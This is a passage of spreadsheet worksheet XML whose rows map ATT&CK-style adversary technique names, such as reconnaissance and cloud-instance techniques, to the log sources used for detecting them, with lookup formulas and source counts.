    <row r="486" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A486" s="55" t="s">
        <v>2701</v>
      </c>
      <c r="B486" s="17" t="str">
        <f>LOOKUP(A486,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C486" s="53">
        <v>0</v>
      </c>
      <c r="D486" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E486" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G486" s="53" t="str">
        <f>VLOOKUP(A486,'REF-DataSources'!A:B,2)</f>
        <v>Gather Victim Identity Information</v>
      </c>
    </row>
    <row r="487" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A487" s="55" t="s">
        <v>2706</v>
      </c>
      <c r="B487" s="17" t="str">
        <f>LOOKUP(A487,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C487" s="53">
        <v>0</v>
      </c>
      <c r="D487" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E487" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G487" s="53" t="str">
        <f>VLOOKUP(A487,'REF-DataSources'!A:B,2)</f>
        <v>Credentials</v>
      </c>
    </row>
    <row r="488" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A488" s="55" t="s">
        <v>2709</v>
      </c>
      <c r="B488" s="17" t="str">
        <f>LOOKUP(A488,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C488" s="53">
        <v>0</v>
      </c>
      <c r="D488" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E488" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G488" s="53" t="str">
        <f>VLOOKUP(A488,'REF-DataSources'!A:B,2)</f>
        <v>Email Addresses</v>
      </c>
    </row>
    <row r="489" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A489" s="55" t="s">
        <v>2712</v>
      </c>
      <c r="B489" s="17" t="str">
        <f>LOOKUP(A489,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C489" s="53">
        <v>0</v>
      </c>
      <c r="D489" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E489" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G489" s="53" t="str">
        <f>VLOOKUP(A489,'REF-DataSources'!A:B,2)</f>
        <v>Employee Names</v>
      </c>
    </row>
    <row r="490" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A490" s="55" t="s">
        <v>2715</v>
      </c>
      <c r="B490" s="17" t="str">
        <f>LOOKUP(A490,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C490" s="53">
        <v>0</v>
      </c>
      <c r="D490" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E490" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G490" s="53" t="str">
        <f>VLOOKUP(A490,'REF-DataSources'!A:B,2)</f>
        <v>Gather Victim Network Information</v>
      </c>
    </row>
    <row r="491" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A491" s="55" t="s">
        <v>2718</v>
      </c>
      <c r="B491" s="17" t="str">
        <f>LOOKUP(A491,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C491" s="53">
        <v>0</v>
      </c>
      <c r="D491" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E491" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G491" s="53" t="str">
        <f>VLOOKUP(A491,'REF-DataSources'!A:B,2)</f>
        <v>Domain Properties</v>
      </c>
    </row>
    <row r="492" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A492" s="55" t="s">
        <v>2721</v>
      </c>
      <c r="B492" s="17" t="str">
        <f>LOOKUP(A492,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C492" s="53">
        <v>0</v>
      </c>
      <c r="D492" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E492" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G492" s="53" t="str">
        <f>VLOOKUP(A492,'REF-DataSources'!A:B,2)</f>
        <v>DNS</v>
      </c>
    </row>
    <row r="493" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A493" s="55" t="s">
        <v>2723</v>
      </c>
      <c r="B493" s="17" t="str">
        <f>LOOKUP(A493,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C493" s="53">
        <v>0</v>
      </c>
      <c r="D493" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E493" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G493" s="53" t="str">
        <f>VLOOKUP(A493,'REF-DataSources'!A:B,2)</f>
        <v>Network Trust Dependencies</v>
      </c>
    </row>
    <row r="494" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A494" s="55" t="s">
        <v>2726</v>
      </c>
      <c r="B494" s="17" t="str">
        <f>LOOKUP(A494,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C494" s="53">
        <v>0</v>
      </c>
      <c r="D494" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E494" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G494" s="53" t="str">
        <f>VLOOKUP(A494,'REF-DataSources'!A:B,2)</f>
        <v>Network Topology</v>
      </c>
    </row>
    <row r="495" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A495" s="55" t="s">
        <v>2729</v>
      </c>
      <c r="B495" s="17" t="str">
        <f>LOOKUP(A495,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C495" s="53">
        <v>0</v>
      </c>
      <c r="D495" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E495" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G495" s="53" t="str">
        <f>VLOOKUP(A495,'REF-DataSources'!A:B,2)</f>
        <v>IP Addresses</v>
      </c>
    </row>
    <row r="496" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A496" s="55" t="s">
        <v>2732</v>
      </c>
      <c r="B496" s="17" t="str">
        <f>LOOKUP(A496,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C496" s="53">
        <v>0</v>
      </c>
      <c r="D496" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E496" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G496" s="53" t="str">
        <f>VLOOKUP(A496,'REF-DataSources'!A:B,2)</f>
        <v>Network Security Appliances</v>
      </c>
    </row>
    <row r="497" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A497" s="55" t="s">
        <v>2735</v>
      </c>
      <c r="B497" s="17" t="str">
        <f>LOOKUP(A497,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C497" s="53">
        <v>0</v>
      </c>
      <c r="D497" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E497" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G497" s="53" t="str">
        <f>VLOOKUP(A497,'REF-DataSources'!A:B,2)</f>
        <v>Gather Victim Org Information</v>
      </c>
    </row>
    <row r="498" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A498" s="55" t="s">
        <v>2738</v>
      </c>
      <c r="B498" s="17" t="str">
        <f>LOOKUP(A498,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C498" s="53">
        <v>0</v>
      </c>
      <c r="D498" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E498" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G498" s="53" t="str">
        <f>VLOOKUP(A498,'REF-DataSources'!A:B,2)</f>
        <v>Determine Physical Locations</v>
      </c>
    </row>
    <row r="499" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A499" s="55" t="s">
        <v>2741</v>
      </c>
      <c r="B499" s="17" t="str">
        <f>LOOKUP(A499,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C499" s="53">
        <v>0</v>
      </c>
      <c r="D499" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E499" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G499" s="53" t="str">
        <f>VLOOKUP(A499,'REF-DataSources'!A:B,2)</f>
        <v>Business Relationships</v>
      </c>
    </row>
    <row r="500" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A500" s="55" t="s">
        <v>2744</v>
      </c>
      <c r="B500" s="17" t="str">
        <f>LOOKUP(A500,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C500" s="53">
        <v>0</v>
      </c>
      <c r="D500" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E500" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G500" s="53" t="str">
        <f>VLOOKUP(A500,'REF-DataSources'!A:B,2)</f>
        <v>Identify Business Tempo</v>
      </c>
    </row>
    <row r="501" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A501" s="55" t="s">
        <v>2747</v>
      </c>
      <c r="B501" s="17" t="str">
        <f>LOOKUP(A501,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C501" s="53">
        <v>0</v>
      </c>
      <c r="D501" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E501" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G501" s="53" t="str">
        <f>VLOOKUP(A501,'REF-DataSources'!A:B,2)</f>
        <v>Identify Roles</v>
      </c>
    </row>
    <row r="502" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A502" s="55" t="s">
        <v>2750</v>
      </c>
      <c r="B502" s="17" t="str">
        <f>LOOKUP(A502,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C502" s="53">
        <v>0</v>
      </c>
      <c r="D502" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E502" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G502" s="53" t="str">
        <f>VLOOKUP(A502,'REF-DataSources'!A:B,2)</f>
        <v>Gather Victim Host Information</v>
      </c>
    </row>
    <row r="503" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A503" s="55" t="s">
        <v>2753</v>
      </c>
      <c r="B503" s="17" t="str">
        <f>LOOKUP(A503,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C503" s="53">
        <v>0</v>
      </c>
      <c r="D503" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E503" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G503" s="53" t="str">
        <f>VLOOKUP(A503,'REF-DataSources'!A:B,2)</f>
        <v>Hardware</v>
      </c>
    </row>
    <row r="504" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A504" s="55" t="s">
        <v>2756</v>
      </c>
      <c r="B504" s="17" t="str">
        <f>LOOKUP(A504,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C504" s="53">
        <v>0</v>
      </c>
      <c r="D504" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E504" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G504" s="53" t="str">
        <f>VLOOKUP(A504,'REF-DataSources'!A:B,2)</f>
        <v>Software</v>
      </c>
    </row>
    <row r="505" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A505" s="55" t="s">
        <v>2759</v>
      </c>
      <c r="B505" s="17" t="str">
        <f>LOOKUP(A505,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C505" s="53">
        <v>0</v>
      </c>
      <c r="D505" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E505" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G505" s="53" t="str">
        <f>VLOOKUP(A505,'REF-DataSources'!A:B,2)</f>
        <v>Firmware</v>
      </c>
    </row>
    <row r="506" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A506" s="55" t="s">
        <v>2762</v>
      </c>
      <c r="B506" s="17" t="str">
        <f>LOOKUP(A506,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C506" s="53">
        <v>0</v>
      </c>
      <c r="D506" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E506" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G506" s="53" t="str">
        <f>VLOOKUP(A506,'REF-DataSources'!A:B,2)</f>
        <v>Client Configurations</v>
      </c>
    </row>
    <row r="507" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A507" s="55" t="s">
        <v>2765</v>
      </c>
      <c r="B507" s="17" t="str">
        <f>LOOKUP(A507,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C507" s="53">
        <v>0</v>
      </c>
      <c r="D507" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E507" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G507" s="53" t="str">
        <f>VLOOKUP(A507,'REF-DataSources'!A:B,2)</f>
        <v>Search Open Websites/Domains</v>
      </c>
    </row>
    <row r="508" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A508" s="55" t="s">
        <v>2768</v>
      </c>
      <c r="B508" s="17" t="str">
        <f>LOOKUP(A508,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C508" s="53">
        <v>0</v>
      </c>
      <c r="D508" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E508" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G508" s="53" t="str">
        <f>VLOOKUP(A508,'REF-DataSources'!A:B,2)</f>
        <v>Social Media</v>
      </c>
    </row>
    <row r="509" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A509" s="55" t="s">
        <v>2771</v>
      </c>
      <c r="B509" s="17" t="str">
        <f>LOOKUP(A509,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C509" s="53">
        <v>0</v>
      </c>
      <c r="D509" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E509" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G509" s="53" t="str">
        <f>VLOOKUP(A509,'REF-DataSources'!A:B,2)</f>
        <v>Search Engines</v>
      </c>
    </row>
    <row r="510" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A510" s="55" t="s">
        <v>2774</v>
      </c>
      <c r="B510" s="17" t="str">
        <f>LOOKUP(A510,'REF-DataSources'!A:C)</f>
        <v>Web logs</v>
      </c>
      <c r="C510" s="53">
        <v>100</v>
      </c>
      <c r="D510" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E510" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G510" s="53" t="str">
        <f>VLOOKUP(A510,'REF-DataSources'!A:B,2)</f>
        <v>Search Victim-Owned Websites</v>
      </c>
    </row>
    <row r="511" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A511" s="55" t="s">
        <v>2779</v>
      </c>
      <c r="B511" s="17" t="str">
        <f>LOOKUP(A511,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs</v>
      </c>
      <c r="C511" s="53" t="s">
        <v>55</v>
      </c>
      <c r="D511" s="17">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="E511" s="17">
        <f t="shared" si="16"/>
        <v>2</v>
      </c>
      <c r="G511" s="53" t="str">
        <f>VLOOKUP(A511,'REF-DataSources'!A:B,2)</f>
        <v>Active Scanning</v>
      </c>
    </row>
    <row r="512" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A512" s="55" t="s">
        <v>2784</v>
      </c>
      <c r="B512" s="17" t="str">
        <f>LOOKUP(A512,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs</v>
      </c>
      <c r="C512" s="53" t="s">
        <v>55</v>
      </c>
      <c r="D512" s="17">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="E512" s="17">
        <f t="shared" si="16"/>
        <v>2</v>
      </c>
      <c r="G512" s="53" t="str">
        <f>VLOOKUP(A512,'REF-DataSources'!A:B,2)</f>
        <v>Scanning IP Blocks</v>
      </c>
    </row>
    <row r="513" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A513" s="55" t="s">
        <v>2788</v>
      </c>
      <c r="B513" s="17" t="str">
        <f>LOOKUP(A513,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C513" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D513" s="17">
        <f t="shared" si="15"/>
        <v>4</v>
      </c>
      <c r="E513" s="17">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="G513" s="53" t="str">
        <f>VLOOKUP(A513,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="514" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A514" s="55" t="s">
        <v>2791</v>
      </c>
      <c r="B514" s="17" t="str">
        <f>LOOKUP(A514,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C514" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D514" s="17">
        <f t="shared" si="15"/>
        <v>4</v>
      </c>
      <c r="E514" s="17">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="G514" s="53" t="str">
        <f>VLOOKUP(A514,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="515" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A515" s="55" t="s">
        <v>2794</v>
      </c>
      <c r="B515" s="17" t="str">
        <f>LOOKUP(A515,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C515" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D515" s="17">
        <f t="shared" ref="D515:D569" si="17">LEN(TRIM(B515))-LEN(SUBSTITUTE(TRIM(B515),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E515" s="17">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="G515" s="53" t="str">
        <f>VLOOKUP(A515,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="516" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A516" s="55" t="s">
        <v>2797</v>
      </c>
      <c r="B516" s="17" t="str">
        <f>LOOKUP(A516,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C516" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D516" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E516" s="17">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="G516" s="53" t="str">
        <f>VLOOKUP(A516,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="517" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A517" s="55" t="s">
        <v>2800</v>
      </c>
      <c r="B517" s="17" t="str">
        <f>LOOKUP(A517,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C517" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D517" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E517" s="17">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="G517" s="53" t="str">
        <f>VLOOKUP(A517,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="518" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A518" s="55" t="s">
        <v>2802</v>
      </c>
      <c r="B518" s="17" t="str">
        <f>LOOKUP(A518,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C518" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D518" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E518" s="17">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="G518" s="53" t="str">
        <f>VLOOKUP(A518,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="519" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A519" s="55" t="s">
        <v>2805</v>
      </c>
      <c r="B519" s="17" t="str">
        <f>LOOKUP(A519,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C519" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D519" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E519" s="17">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="G519" s="53" t="str">
        <f>VLOOKUP(A519,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="520" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A520" s="55" t="s">
        <v>2808</v>
      </c>
      <c r="B520" s="17" t="str">
        <f>LOOKUP(A520,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C520" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D520" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E520" s="17">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="G520" s="53" t="str">
        <f>VLOOKUP(A520,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="521" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A521" s="55" t="s">
        <v>2811</v>
      </c>
      <c r="B521" s="17" t="str">
        <f>LOOKUP(A521,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C521" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D521" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E521" s="17">
        <f t="shared" si="16"/>
        <v>4</v>
      </c>
      <c r="G521" s="53" t="str">
        <f>VLOOKUP(A521,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="522" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A522" s="55" t="s">
        <v>2814</v>
      </c>
      <c r="B522" s="17" t="str">
        <f>LOOKUP(A522,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C522" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D522" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E522" s="17">
        <f t="shared" ref="E522:E569" si="18">LEN(TRIM(C522))-LEN(SUBSTITUTE(TRIM(C522),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="G522" s="53" t="str">
        <f>VLOOKUP(A522,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="523" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A523" s="55" t="s">
        <v>2817</v>
      </c>
      <c r="B523" s="17" t="str">
        <f>LOOKUP(A523,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C523" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D523" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E523" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G523" s="53" t="str">
        <f>VLOOKUP(A523,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="524" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A524" s="55" t="s">
        <v>2822</v>
      </c>
      <c r="B524" s="17" t="str">
        <f>LOOKUP(A524,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C524" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D524" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E524" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G524" s="53" t="str">
        <f>VLOOKUP(A524,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="525" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A525" s="55" t="s">
        <v>2826</v>
      </c>
      <c r="B525" s="17" t="str">
        <f>LOOKUP(A525,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C525" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D525" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E525" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G525" s="53" t="str">
        <f>VLOOKUP(A525,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="526" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A526" s="55" t="s">
        <v>2830</v>
      </c>
      <c r="B526" s="17" t="str">
        <f>LOOKUP(A526,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C526" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D526" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E526" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G526" s="53" t="str">
        <f>VLOOKUP(A526,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="527" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A527" s="55" t="s">
        <v>2833</v>
      </c>
      <c r="B527" s="17" t="str">
        <f>LOOKUP(A527,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C527" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D527" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E527" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G527" s="53" t="str">
        <f>VLOOKUP(A527,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="528" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A528" s="55" t="s">
        <v>2838</v>
      </c>
      <c r="B528" s="17" t="str">
        <f>LOOKUP(A528,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C528" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D528" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E528" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G528" s="53" t="str">
        <f>VLOOKUP(A528,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="529" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A529" s="55" t="s">
        <v>2842</v>
      </c>
      <c r="B529" s="17" t="str">
        <f>LOOKUP(A529,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C529" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D529" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E529" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G529" s="53" t="str">
        <f>VLOOKUP(A529,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="530" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A530" s="55" t="s">
        <v>2847</v>
      </c>
      <c r="B530" s="17" t="str">
        <f>LOOKUP(A530,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C530" s="53" t="s">
